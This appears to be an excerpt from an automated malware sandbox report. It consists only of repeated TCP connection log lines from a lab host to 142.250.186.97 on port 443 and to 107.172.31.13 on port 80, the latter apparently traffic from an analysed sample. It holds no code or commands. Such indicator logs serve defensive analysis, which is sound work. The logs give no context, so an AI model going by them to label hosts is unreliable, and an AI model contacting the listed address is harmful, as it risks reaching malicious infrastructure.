                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
